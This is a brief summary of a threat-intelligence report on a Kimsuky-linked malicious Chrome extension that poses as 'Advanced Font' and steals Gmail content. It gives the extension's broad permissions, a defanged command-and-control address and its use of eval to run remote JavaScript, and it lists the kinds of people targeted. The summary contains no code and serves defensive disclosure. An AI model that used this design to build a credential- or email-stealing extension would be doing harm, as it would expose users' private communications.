The Wezard4u analysis describes a Kimsuky-linked malicious Google Chrome extension used to steal email content from Gmail and potentially other Chromium-based browsers. The extension masquerades as “AF” or “Advanced Font,” requests broad permissions for tabs, navigation, cookies, and HTTP/HTTPS sites, and loads a background script that repeatedly contacts gonamod[.]com/sanghyon/index.php. The script can receive and execute remote JavaScript with eval, monitor browser events, handle messages, and includes helper routines for email validation, parameter extraction, and encoding. The report frames the activity as part of Kimsuky’s broader targeting of diplomats, journalists, government personnel, professors, politicians, and North Korea-related organizations.